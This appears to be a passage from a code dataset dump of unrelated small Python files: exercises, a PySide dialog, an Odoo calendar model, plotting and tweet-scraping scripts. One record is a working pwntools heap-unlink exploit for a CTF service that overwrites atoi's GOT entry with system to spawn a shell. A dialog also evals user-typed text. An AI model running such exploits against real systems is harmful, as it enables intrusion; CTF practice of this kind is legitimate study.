tableUn(k) :\n print(8*k,end=\" \")\n\ntableUn(9)\n","sub_path":"BTS-SIO/algorithme/1ère année/TP5-Fonctions/Fonctions/exercice3.py","file_name":"exercice3.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"439394693","text":"#shape of the matrices\n\nimport tensorflow as tf\nimport numpy as np \n\na=np.ones([7,1])\nb=np.ones([7])\n\nsa=tf.shape(a)\nsb=tf.shape(b)\n\nprint(a)\nprint(b)\nprint(sa, sb)","sub_path":"tf_shape0626.py","file_name":"tf_shape0626.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"26263432","text":"from PySide2.QtWidgets import QDialog, QDialogButtonBox, QVBoxLayout, QPlainTextEdit, QShortcut\nfrom PySide2.QtGui import QKeySequence\n\n\nclass EditVarVal_Dialog(QDialog):\n def __init__(self, parent, var):\n super(EditVarVal_Dialog, self).__init__(parent)\n\n # shortcut\n save_shortcut = QShortcut(QKeySequence.Save, self)\n save_shortcut.activated.connect(self.save_triggered)\n\n main_layout = QVBoxLayout()\n\n self.val_text_edit = QPlainTextEdit()\n var_val_str = ''\n try:\n var_val_str = str(var.val)\n except Exception as e:\n var_val_str = 'couldn\\'nt stringify value'\n self.val_text_edit.setPlainText(var_val_str)\n\n main_layout.addWidget(self.val_text_edit)\n\n button_box = QDialogButtonBox()\n button_box.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok)\n button_box.accepted.connect(self.accept)\n button_box.rejected.connect(self.reject)\n\n main_layout.addWidget(button_box)\n\n self.setLayout(main_layout)\n self.resize(450, 300)\n\n self.setWindowTitle('edit var val \\''+var.name+'\\'')\n\n def save_triggered(self):\n self.accept()\n\n\n def 
get_val(self):\n val = self.val_text_edit.toPlainText()\n try:\n val = eval(val)\n except Exception as e:\n pass\n return val","sub_path":"Ryven/custom_src/script_variables/EditVarVal_Dialog.py","file_name":"EditVarVal_Dialog.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"192733183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'Fu Yangzhen'\n\n\n# Created on 2016/10/12\n\nclass Solution:\n def fizzBuzz(self, n):\n results = []\n for i in range(1, n + 1):\n if i % 15 == 0:\n results.append(\"fizz buzz\")\n elif i % 5 == 0:\n results.append(\"buzz\")\n elif i % 3 == 0:\n results.append(\"fizz\")\n else:\n results.append(str(i))\n return results\n\n\nwhile True:\n try:\n n = input()\n print(Solution().fizzBuzz(int(n)))\n except EOFError:\n break\n","sub_path":"LintCode/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"497391617","text":"from pwn import *\n\nr = remote('pwn2.jarvisoj.com',9886)\nelf = ELF('./freenote_x64')\nlibc = ELF('./libc-2.19.so')\n\ndef list():\n r.sendlineafter('choice: ', '1')\n\ndef new(payload):\n r.sendlineafter('choice: ', '2')\n r.sendlineafter('new note: ', str(len(payload)))\n r.sendafter('note: ', payload)\n\ndef edit(num,payload):\n r.sendlineafter('choice: ', '3')\n r.sendlineafter('number: ', str(num))\n r.sendlineafter('note: ', str(len(payload)))\n r.sendafter('your note: ', payload)\n\ndef delete(num):\n r.sendlineafter('choice: ', '4')\n r.sendlineafter('number: ', str(num))\n\n#leak heap base\nnew('a' * 0x80) #0\nnew('a' * 0x80) #1\nnew('a' * 0x80) #2\nnew('a' * 0x80) #3\nnew('a' * 0x80) #4\n#malloc chunk4 to avoid chunk3 consolidated to topchunk\n\ndelete(3)\ndelete(1)\nedit(0,'a' * 0x80 +'b' * 0x10)\n#overwrite next chunk'header to leak\n\nlist()\n\nr.recvuntil('b' * 0x10)\nheap_base = u64(r.recvuntil('\\x0a', drop=True).ljust(0x8,'\\x00')) - 0x19c0 # 0x1810 + 3 * 0x90\nchunk0 = heap_base + 0x20\nsuccess('leak heap base')\nsuccess('heapbase:' + hex(heap_base))\n\nsleep(1)\n\n#unlink\npayload = p64(0) + p64(0x80) + p64(chunk0 - 3 * 8) + p64(chunk0 - 2 * 8) + 'a' * (0x80 - 4 * 8) + p64(0x80) + p64(0x90)\npayload = payload.ljust(0x100,'\\xbb') # 0x80 * 2\nedit(0, payload)\n\ndelete(1)\nsuccess('unlink')\n\nsleep(1)\n\n#leak libc base\npayload2 = p64(2) + p64(1) + p64(0x80) + p64(chunk0) + p64(1) + p64(8) + p64(elf.got['atoi'])\npayload2 = payload2.ljust(0x100, '\\xbb')\nedit(0, payload2)\n\nlist()\n\nr.recvuntil('1. 
')\nlibc_base = u64(r.recvuntil('\\x0a', drop=True).ljust(0x8, '\\x00')) - libc.sym['atoi']\nsuccess(hex(libc_base))\n\n#modify atoi to system to getshell\nsys_addr = libc_base + libc.sym['system']\n\nedit(1, p64(sys_addr)) # *(&atoi@got) = sys_addr\n\nr.sendlineafter('choice: ', '/bin/sh\\0')\n\nr.interactive()","sub_path":"JarvisOJ/XMAN/level6/level6_x64/level6_x64.py","file_name":"level6_x64.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"53544725","text":"\"\"\"\nCreated on Tue Dec 5 21:10:04 2018\n@author: Ismael Cesar\ne-mail: ismael.c.s.a@hotmail.com\n\n\"\"\"\nimport numpy as np\nimport torch\nfrom torch.utils.data.dataset import Dataset\n#from darts_for_wine.winesC20 import calload\n\n\n\nclass WinesDataset(Dataset):\n \"\"\"\n Class to be used by the data loader for getting the data.\n \"\"\"\n\n def __init__(self, data, labels, use_nparrays=False):\n # Transform the numpy arrays into float tensors\n \"\"\"\n :param data: Array with the data\n :param labels: An array with the corresponding labels\n :param use_nparrays: if set to false. the procedure will transform the nparrays into\n pytorch tensors\n \"\"\"\n self.data = []\n self.labels = []\n if use_nparrays == False:\n\n for d, l in zip(data, labels):\n self.data.append(d.reshape(1, d.shape[0], d.shape[1]).tolist())\n self.labels.append(l)\n\n self.data = torch.FloatTensor(self.data)\n self.labels = torch.LongTensor(self.labels)\n\n else:\n self.data = torch.from_numpy(data.reshape(data.shape[0], 1, data.shape[1], data.shape[2]))\n self.labels = torch.from_numpy(labels)\n\n def __getitem__(self, item):\n \"\"\"\n :param item:\n :return: A tuple with the tensor and its corresponding labels\n \"\"\"\n return (self.data[item],self.labels[item])\n\n def __len__(self):\n \"\"\"\n :return: returns the size of the dataset\n \"\"\"\n return self.data.shape[0]\n","sub_path":"cnn/darts_for_wine/winedataset.py","file_name":"winedataset.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"34402326","text":"# -*- coding: utf-8 -*-\n# © 2017 Pharmadus I.T.\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\nfrom openerp import models, fields, api\nfrom datetime import date, timedelta\n\n\nclass BaseCalendar(models.Model):\n _name = 'base.calendar'\n _description = 'Calendar'\n _rec_name = 'year'\n _order = 'year desc'\n\n year = fields.Integer('Year')\n\n\nclass BaseCalendarDays(models.Model):\n _name = 'base.calendar.days'\n _rec_name = 'day'\n _order = 'day'\n\n day = fields.Date('Day', readonly=True)\n weekday = fields.Selection([(1, 'monday'),\n (2, 'tuesday'),\n (3, 'wednesday'),\n (4, 'thursday'),\n (5, 'friday'),\n (6, 'saturday'),\n (7, 'sunday')], readonly=True)\n week = fields.Integer(readonly=True)\n month = fields.Selection([(1, 'january'),\n (2, 'february'),\n (3, 'march'),\n (4, 'april'),\n (5, 'may'),\n (6, 'june'),\n (7, 'july'),\n (8, 'august'),\n (9, 'september'),\n (10, 'october'),\n (11, 'november'),\n (12, 'december')])\n year = fields.Many2one(comodel_name='base.calendar', ondelete='cascade')\n holiday = fields.Boolean('Holiday?', default=False)\n\n\nclass BaseCalendar(models.Model):\n _inherit = 'base.calendar'\n\n days = fields.One2many(comodel_name='base.calendar.days',\n inverse_name='year')\n mrp_days = fields.One2many(comodel_name='mrp.calendar.days',\n inverse_name='year')\n\n @api.model\n def 
create(self, vals):\n        res = super(BaseCalendar, self).create(vals)\n\n        def perdelta(start, end, delta):\n            curr = start\n            while curr < end:\n                yield curr\n                curr += delta\n\n        days = []\n        for d in perdelta(date(res.year, 1, 1),\n                          date(res.year + 1, 1, 1),\n                          timedelta(days=1)):\n            days.append((0, 0, {\n                'day': d,\n                'weekday': d.isoweekday(),\n                'week': d.isocalendar()[1],\n                'month': d.month\n            }))\n        res.write({'days': days})\n\n        mrp_days = []\n        for d in res.days.ids:\n            mrp_days.append((0, 0, {'base_day': d}))\n        res.write({'mrp_days': mrp_days})\n\n        return res","sub_path":"project-addons/custom_calendars/models/base_calendar.py","file_name":"base_calendar.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"37324279","text":"#--------------------------------------------------------------------\n#File: \tlog_util.py\n#Author: F.Kesel\n#Date: \t29.12.2015\n#Purpose:Functions for log-file handling \n#--------------------------------------------------------------------\n\n\n\n#Read data from log file \"fileName\"\n#x: x-axis, y: y-axis\ndef readLogFile(fileName, x, y ):\n\tthefile = open(fileName, \"r\")\n\twhile thefile:\n\t\tline = thefile.readline()\n\t\tif len(line) < 2:\n\t\t\tbreak\n\t\telements = line.split()\n\t\tx.append(elements[0])\n\t\ty.append(elements[1])\n\tthefile.close()\n\n\n","sub_path":"lib/log_util.py","file_name":"log_util.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"317645409","text":"#!/usr/bin/env python\nimport tldextract\nimport sys\nimport time\ndef main():\n    with open('testdata.txt') as fp:\n        for line in fp:\n            line=line.strip('\\n')\n            ext=tldextract.extract(line)\n            time.sleep(.20)\n            print('.'.join(ext[1:]))\nif __name__ == '__main__':\n    main()\n","sub_path":"tld_extract.py","file_name":"tld_extract.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"259550225","text":"import pandas as pd\n\ndf = pd.read_csv(\"raw-data/output/Context_Output_full.csv\")\nprint(df.head())\n\n#     Unnamed: 0  position left original mutation right  WRT_ORI  WRT_TERM full_original full_mutation\n#0      newrow      1807    G        T        C     C  4168193   1861193           GTC           GCC\n#1      newrow      1810    T        G        A     T  4168190   1861190           TGT           TAT\n#2      newrow      2854    T        T        C     C  4167146   1860146           TTC           TCC\n#3      newrow      3701    C        A        C     A  4166299   1859299           CAA           CCA\n#4      newrow      4731    G        G        A     T  4165269   1858269           GGT            GA\n#attach new cols to the dataframe\ndf['full_original'] = df.apply(lambda row: row.left + row.original + row.right, axis=1)\ndf['full_mutation'] = df.apply(lambda row: row.left + row.mutation + row.right, axis=1)\nprint(df.head())\n\nprint()\n\n\n#Looks Like\n#AAA     2\n#AAC     8\n#AAG     1\n#AAT     1\n#ACA     2\ncounts = df.groupby('full_mutation')['position'].nunique()\nprint (counts.head())\n\nfor row in df.groupby('full_mutation'):\n    print(''',\n    \n    {\n      \"name\": \"''' + str(row[0]) + '''\",\n      \"series\": [\n        {\n          \"name\": \"2010\",\n          \"value\": 5000002\n        },\n        {\n          \"name\": \"2011\",\n          \"value\": 5800000\n        }\n      ]\n    }''')\n#Create CSV File\ncounts.to_csv('processed-data/bacillus-mutations.csv', sep=',', encoding='utf-8')\n\n#Create JSON File\n\nimport json\nd = counts.to_dict()\nd['species'] = \"bacillus\"\n\nwith open('processed-data/bacillus-mutations.json', 'w') as outfile:\n    json.dump(d, 
outfile)","sub_path":"chromosome-csv-to-json.py","file_name":"chromosome-csv-to-json.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"565100151","text":"\"\"\"Test Pause Set Insteon ACK Message Two Bytes.\"\"\"\nimport unittest\nfrom binascii import unhexlify\n\nfrom pyinsteon.constants import MessageId\nfrom pyinsteon.protocol.messages.outbound import set_ack_message_two_bytes\nfrom tests import set_log_levels\nfrom tests.test_messages.test_outbound.outbound_base import OutboundBase\n\n\nclass PauseSetInsteonAckMessageTwoBytes(unittest.TestCase, OutboundBase):\n \"\"\"Test Pause Set Insteon ACK Message Two Bytes.\"\"\"\n\n def setUp(self):\n \"\"\"Test set up.\"\"\"\n self.hex = \"02710304\"\n self.cmd1 = int(0x03)\n self.cmd2 = int(0x04)\n\n kwargs = {\"cmd1\": self.cmd1, \"cmd2\": self.cmd2}\n\n super(PauseSetInsteonAckMessageTwoBytes, self).base_setup(\n MessageId.SET_ACK_MESSAGE_TWO_BYTES, unhexlify(self.hex), **kwargs\n )\n\n self.msg = set_ack_message_two_bytes(self.cmd1, self.cmd2)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )\n\n def test_cmd1(self):\n \"\"\"Test cmd1.\"\"\"\n assert self.msg.cmd1 == self.cmd1\n\n def test_cmd2(self):\n \"\"\"Test cmd2.\"\"\"\n assert self.msg.cmd2 == self.cmd2\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_messages/test_outbound/pause_set_insteon_ack_message_two_bytes.py","file_name":"pause_set_insteon_ack_message_two_bytes.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"269371550","text":"# -*- coding: UTF-8 -*-\n#花式索引\nimport scipy.misc\nimport matplotlib.pyplot as plt\n\nface = scipy.misc.face()\nxmax = face.shape[0]\nymax = face.shape[1]\nface = face[:min(xmax, ymax), :min(xmax, ymax)]\nacopy = face.copy()\nxmax = acopy.shape[0]\nymax = acopy.shape[1]\nacopy[range(xmax), range(ymax)] = 0\nacopy[range(xmax-1, -1, -1), range(ymax)] = 0\nplt.imshow(acopy)\nplt.show()\n","sub_path":"python/Learn/Course/PythonDataAnalysis/Chapter2/test2.8.py","file_name":"test2.8.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"140037907","text":"\"\"\"Configuration settings for train_dagger, training DAgger from synthetic demos.\"\"\"\n\nimport sacred\n\nfrom imitation.scripts.ingredients import bc\nfrom imitation.scripts.ingredients import demonstrations as demos_common\nfrom imitation.scripts.ingredients import environment, expert\nfrom imitation.scripts.ingredients import logging as logging_ingredient\nfrom imitation.scripts.ingredients import policy, policy_evaluation\n\ntrain_imitation_ex = sacred.Experiment(\n \"train_imitation\",\n ingredients=[\n logging_ingredient.logging_ingredient,\n demos_common.demonstrations_ingredient,\n policy.policy_ingredient,\n expert.expert_ingredient,\n environment.environment_ingredient,\n policy_evaluation.policy_evaluation_ingredient,\n bc.bc_ingredient,\n ],\n)\n\n\n@train_imitation_ex.config\ndef config():\n dagger = dict(\n use_offline_rollouts=False, # warm-start policy with BC from offline demos\n total_timesteps=1e5,\n beta_schedule=None,\n )\n\n\n@train_imitation_ex.named_config\ndef mountain_car():\n environment = dict(gym_id=\"MountainCar-v0\")\n bc = dict(l2_weight=0.0)\n dagger = 
dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_mountain_car():\n environment = dict(gym_id=\"seals/MountainCar-v0\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef cartpole():\n environment = dict(gym_id=\"CartPole-v1\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef seals_cartpole():\n environment = dict(gym_id=\"seals/CartPole-v0\")\n dagger = dict(total_timesteps=20000)\n\n\n@train_imitation_ex.named_config\ndef pendulum():\n environment = dict(gym_id=\"Pendulum-v1\")\n\n\n@train_imitation_ex.named_config\ndef ant():\n environment = dict(gym_id=\"Ant-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_ant():\n environment = dict(gym_id=\"seals/Ant-v0\")\n\n\n@train_imitation_ex.named_config\ndef half_cheetah():\n environment = dict(gym_id=\"HalfCheetah-v2\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef seals_half_cheetah():\n environment = dict(gym_id=\"seals/HalfCheetah-v0\")\n bc = dict(l2_weight=0.0)\n dagger = dict(total_timesteps=60000)\n\n\n@train_imitation_ex.named_config\ndef humanoid():\n environment = dict(gym_id=\"Humanoid-v2\")\n\n\n@train_imitation_ex.named_config\ndef seals_humanoid():\n environment = dict(gym_id=\"seals/Humanoid-v0\")\n\n\n@train_imitation_ex.named_config\ndef fast():\n dagger = dict(total_timesteps=50)\n bc = dict(train_kwargs=dict(n_batches=50))\n","sub_path":"src/imitation/scripts/config/train_imitation.py","file_name":"train_imitation.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"273871973","text":"import matplotlib.pyplot as plt \r\nfrom matplotlib.lines import Line2D\r\nimport numpy as np\r\nimport param as P \r\n\r\n\r\nclass plotGenerator:\r\n ''' The purpose of this class is to organize multiple plots in one\r\n figure using subplots.The plots will be organized in n x m \r\n dimensions in the figure; where n represents the number of rows, \r\n and m represents the number of columns. Ex, a subplot with \r\n dimensions 3 x 2 will hold 6 plots. 3 plots per row, and 2 plots \r\n per column. \r\n\r\n Not every plot needs to be used. Ex, if you were to plot only \r\n 5 plots, you would still need dimensions 3 x 2 and one of the \r\n plots would never be populated.'''\r\n\r\n # You only need to modify the code inside '#'s as shown below.\r\n ##################################################################\r\n # CODE TO BE MODIFIED\r\n ##################################################################\r\n def __init__(self):\r\n #SECTION 1\r\n ##############################################################\r\n # Number of subplots = num_of_rows*num_of_cols\r\n self.num_of_rows = 2 # Number of subplot rows\r\n self.num_of_cols = 2 # Number of subplot columns\r\n ##############################################################\r\n\r\n # Crete figure and axes handles\r\n self.fig, self.ax = plt.subplots(self.num_of_rows, \r\n self.num_of_cols, sharex=True) \r\n\r\n # A list to hold the time history\r\n self.time_history = [] \r\n\r\n # The list type variable will store your plot objects\r\n self.handle = [] \r\n\r\n ''' Create the handles below.\r\n The class plotGenerator inherits the class myPlot, and \r\n organizes one or more instances of myPlot in a figure. The \r\n myPlot class organizes one or more line objects in a single \r\n axes. 
The syntax for myPlot is\r\n\r\n myPlot(axes,gain,xlabel,ylable,etc)\r\n\r\n To see a full description of myPlot, read the comments located \r\n in the class myPlot. However, note that all arguments have \r\n default values except the axes argument. \r\n (i.e., A myPlot object could easily be created by\r\n\r\n myPlot(self.ax[0])\r\n\r\n The class myPlot also supports pass-by-reference and \r\n pass-by-name. Examples are given below.\r\n\r\n self.handle.append(myPlot(self.ax[0],2,'xlabel','ylabel',\r\n 'title'))\r\n self.handle.append(myPlot(self.ax[1],180.0/np.pi,\r\n title=\"y_r/y\")\r\n self.handle.append(myPlot(self.ax[2],1,title=\"Force\",\r\n legend=(\"Force\",\"Torque\"))\r\n\r\n The myPlot class also comes with default line and color \r\n styles. You can either specify the line or color styles \r\n that you want when creating the myPlot object or you can \r\n modify the default values that are contained within the \r\n myPlot class.\r\n '''\r\n # Section 2\r\n ####################################################################\r\n self.handle.append(myPlot(self.ax[0,0],180.0/np.pi,'t(s)', 'deg', \r\n 'theta_r/theta'))\r\n self.handle.append(myPlot(self.ax[0,1],180.0/np.pi,'t(s)', 'deg', \r\n 'psi'))\r\n self.handle.append(myPlot(self.ax[1,0],180.0/np.pi,'t(s)', 'deg', \r\n 'phi_r/phi'))\r\n self.handle.append(myPlot(self.ax[1,1],P.km,'t(s)','Nm','force',legend=('fl','fr')))\r\n ####################################################################\r\n \r\n\r\n # Update the history\r\n def updateDataHistory(self,new_t, new_data):\r\n\r\n \"\"\"\r\n This function updates the data history of all the plots.\r\n - new_t: The current simulation time.\r\n - new_data: Is a list of data lists for each plot. The \r\n order of the data must be the same order in which\r\n the classes myPlot were created. \r\n\r\n Ex: There are two subplots. Instantiated as shown below\r\n\r\n self.handle.append(myPlot(self.ax[0],180.0/np.pi,\r\n 't(s)', 'deg','theta_r/theta'))\r\n\r\n self.handle.append(myPlot(self.ax[1],1,'t(s)',\r\n 'Nm','torque'))\r\n\r\n The first subplot plots theta_r and theta and the second subplot\r\n plots Torque. Since this is the order in which the myPlot \r\n classes were appended to the handle list, this is the order\r\n in which the data must be passed.\r\n\r\n Continuing the example:\r\n\r\n new_data = [[theta_r,theta],[torque]]\r\n\r\n Notice that new_data is a list of lists. The first inner list\r\n contains the data meant for the first plot, and the second \r\n inner list is meant for the second plot.\r\n \r\n \r\n \"\"\"\r\n \r\n # Add the new time data\r\n self.time_history.append(new_t)\r\n\r\n # Update all other data\r\n for i in range(len(self.handle)):\r\n self.handle[i].updateHistory(new_data[i])\r\n\r\n # Renders the data to the plots\r\n def update_plots(self):\r\n for i in range(len(self.handle)):\r\n self.handle[i].update_plot(self.time_history)\r\n\r\n\r\n\r\n\r\nclass myPlot:\r\n ''' This class organizes one or more line objects on one axes'''\r\n\r\n def __init__(self, ax, gain = 1,xlabel = 'x-axis', \r\n ylabel = 'y-axis',title = 'title', \r\n colors = ['b','r','g','c','m','y','b'], \r\n line_styles = ['-','--','-.',':'], \r\n legend = None, grid = True):\r\n\r\n ''' ax - This is a handle to the an axes of the figure\r\n gain - a scalar variable used on the data. This can be used \r\n to convert between units. Ex. to convert from \r\n radians to degrees, the gain should be 180/np.pi\r\n colors - Indicates the line color. 
If there are multiple lines,\r\n colors can be a list of different colors. Below is a \r\n list of options. Note that they are strings.\r\n\r\n 'b' - blue\r\n 'g' - green\r\n 'r' - red\r\n 'c' - cyan\r\n 'm' - magenta\r\n 'y' - yellow\r\n 'k' - black\r\n\r\n line_style - Indicates the line style. If there are multiple\r\n lines, line_style can be a list of different line \r\n styles. Below is a list of options. Note that they\r\n are strings.\r\n\r\n '-' - solid line\r\n '--' - dashed line\r\n '-.' - dash_dot\r\n ':' - dotted line\r\n\r\n legend - A tuple of strings that identify the data. \r\n EX: (\"data1\",\"data2\", ... , \"dataN\")\r\n\r\n xlable - Label of the x-axis\r\n ylable - Label of the y-axis\r\n title - Plot title\r\n gird - Indicates if a grid is to be overlapped on the plot\r\n '''\r\n\r\n\r\n self.legend = legend\r\n self.data_history = [] # Will contain the data history\r\n self.ax = ax # Axes handle\r\n self.gain = gain # The scales the data\r\n self.colors = colors # A list of colors. \r\n # The first color in the list\r\n # corresponds to the first line\r\n # object.\r\n self.line_styles=line_styles # A list of line styles.\r\n # The first line style in the list\r\n # corresponds to the first line \r\n # object.\r\n self.line = []\r\n\r\n # Configure the axes\r\n self.ax.set_ylabel(ylabel)\r\n self.ax.set_xlabel(xlabel)\r\n self.ax.set_title(title)\r\n self.ax.grid(grid)\r\n\r\n\r\n # Keeps track of initialization\r\n self.init = True \r\n\r\n\r\n # Adds the new data to the data history list after \r\n # scaling it by the gain.\r\n def updateHistory(self,new_data):\r\n # new_data: a list containing the new data.\r\n # Ex: new_data = [theta_r, theta]\r\n self.data_history.append([t*self.gain for t in new_data])\r\n\r\n def update_plot(self,time_history):\r\n\r\n # If it is being initialized\r\n if self.init == True:\r\n\r\n # size contains the number of line objects to create\r\n size = len(self.data_history[0])\r\n\r\n for i in range(size):\r\n # zip rearranges the list\r\n data = zip(*self.data_history)\r\n\r\n # Instantiate line object and add it to the axes\r\n self.line.append(Line2D(time_history,data[i], \r\n color = self.colors[np.mod(i,len(self.colors)-1)], \r\n ls = self.line_styles[np.mod(i,len(self.line_styles)-1)],\r\n label = self.legend[i] if self.legend != None else None))\r\n\r\n self.ax.add_line(self.line[i])\r\n\r\n self.init = False\r\n if self.legend != None:\r\n plt.legend(handles=self.line)\r\n else: # Add new data to the plot\r\n\r\n # zip rearranges the list\r\n data = zip(*self.data_history)\r\n\r\n # Updates the x and y data of each line.\r\n for i in range(len(self.line)):\r\n self.line[i].set_xdata(time_history)\r\n self.line[i].set_ydata(data[i])\r\n\r\n # Adjusts the axis to fit all of the data. 
\r\n self.ax.relim()\r\n self.ax.autoscale()\r\n \r\n\r\n","sub_path":"whirlybird_ws/src/whirlybird_controller/scripts/lab11/sim_plot.py","file_name":"sim_plot.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"7816535","text":"# Calculate the sum of two integers a and b, but you are not allowed to use the operator + and -.\n\n# Example:\n# Given a = 1 and b = 2, return 3.\n\nclass Solution(object):\n def getSum(self, a, b):\n \"\"\"\n :type a: int\n :type b: int\n :rtype: int\n \"\"\"\n MAX_INT = 0X7FFFFFFF # since python int type has arbitrary width, we mimic a signed int type\n MIN_INT = 0X80000000\n MASK = 0X100000000 # detect overfloat\n\n while b:\n a, b = (a^b) % MASK, ((a&b) << 1) % MASK # a mark the part where no carry happened, b mark where the carries happened\n\n return a if a <= MAX_INT else ~((a % MIN_INT) ^ MAX_INT)\n # return a if a is still positive in signed integer representation, otherwise, we have to make it negative \"in python way\"\n\n # this solution can only work for unsigned integer sum\n def getSumPositive(self, a, b):\n \"\"\"\n :type a: int\n :type b: int\n :rtype: int\n \"\"\"\n ans = 0\n base = 1\n while a > 0 or b > 0:\n if a%2 & b%2 == 1:\n ans = ans | (base*2)\n elif a%2 | b%2 == 1:\n if ans / base == 0:\n ans = ans | base\n else:\n ans = (ans & (~base)) | (base*2)\n a = a >> 2\n b = b >> 2\n base = base << 1\n\n return ans\n\n","sub_path":"easy/371.py","file_name":"371.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"492985677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 24\r\n\r\n@author: Mehmeta\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport GetOldTweets3 as got\r\n# Dokümantasyona buradan ulaşabilirsiniz: https://github.com/Mottl/GetOldTweets3\r\n\r\nimport time\r\n\r\ntweetCriteria = got.manager.TweetCriteria().setQuerySearch('aramak_istediginiz_ifade')\\\r\n .setSince(\"2020-05-12\")\\\r\n .setUntil(\"2020-05-13\")\\\r\n .setMaxTweets(10000)\\\r\n .setLang('tr')\r\n\r\n\"\"\" \r\n# setQuerySearch: Buraya aramak istediğiniz ifadeyi yazmalısınız\r\nÖrnek: setQuerySearch('python') içinde python ifadesi geçen;\r\n\t\ttweetleri, kullanıcı isimlerini, bio'kısmında python geçen tüm profilleri getirir.\r\n\t\tEmoji aratmak isterseniz, https://emojipedia.org/large-green-circle/ sitesinden aratabilirsiniz.\r\n\t\tSayfanın en altında \"Browse\" bölümünde twitter'a tıklarsanız, doğrudan twitter search açılır.\r\n\t\tAçılan linkteki \"https://twitter.com/search?q=\"\" ifadesinden hemen sonra çıkan ifayeyi bu alana yazabilirsiniz.\r\n\r\n# setSince: Aramaya hangi tarihten itibaren başlamak istediğinizi ifade eder. YYYY-MM-DD\r\n# setUntil: Aramanın hangi tarihte sona ermesini istediğinizi ifade eder. YYYY-MM-DD\r\n# setMaxTweets: -1 yazarsanız, aradığınız sorgu ile ilgili kaç tweet varsa, hepsini getirir.\r\n\t\t\t\tAma twitter buna engel olabiliyor. 
Ben kendi aramalarımda 10.000 civarı seçiyorum genellikle.\r\n\t\t\t\t\r\n# setLang: Aradığınız sorgunun hangi dilde olmasını isterseniz, bunu yazmalısınız.\r\n# Listeye şu linkten ulaşabilirsiniz: https://developer.twitter.com/en/docs/twitter-for-websites/twitter-for-websites-supported-languages/overview\r\n\"\"\"\r\n\r\nprint('Start...')\r\n# Yukarıda girdiğimiz kriterlere uyan tweetler \"tweets\" objesine alınır.\r\n# Bir hesabın, girdiğimiz kriterler içinde 1'den fazla tweeti varsa, listeye o kadar girer.\r\ntweets = got.manager.TweetManager.getTweets(tweetCriteria)\r\nprint('Collected!')\r\n\r\n# Tweets objesindeki elemanları bir listenin içine alıyoruz.\r\ntweets_list = [[tweet.username, tweet.id, tweet.permalink, tweet.date, tweet.text, tweet.hashtags, tweet.geo] for tweet in tweets] \r\ntweets_list = np.reshape(tweets_list, (-1, 7))\r\n\r\n\r\ndf = pd.DataFrame({'username': tweets_list[:, 0], 'tweet_id': tweets_list[:, 1],\r\n                   'permalink':tweets_list[:, 2], 'date':tweets_list[:, 3],\r\n                   'text':tweets_list[:, 4], 'hashtags':tweets_list[:, 5],\r\n                   'geo':tweets_list[:, 6]})\r\n\r\n# tweetin içindeki tüm hashtagler hashtags kolonu içinde yer alıyor.\r\n# Ancak sorun şu ki, hashtagte Türkçe karakter varsa, hashtag orada kesiliyor.\r\ndf['hashtags'] = df.text.str.findall(r'#.*?(?=\\s|$)') # Bu şekilde daha doğru şekilde alınabilir.\r\n\r\ndf.to_csv('tweet_data.csv',index=False)\r\n\r\nprint(df.head(10))\r\nprint(df.shape)\r\n# print(df.permalink.value_counts())\r\n\r\nprint('Sleep...')\r\ntime.sleep(60*15) # 15 dakika\r\n","sub_path":"1_tweet_collect.py","file_name":"1_tweet_collect.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"469636552","text":"num = int(input())\nleft = 1\nright = num - 1\nflag = False\nif num % 2 == 0:\n    step = int(num /2)\nelse:\n    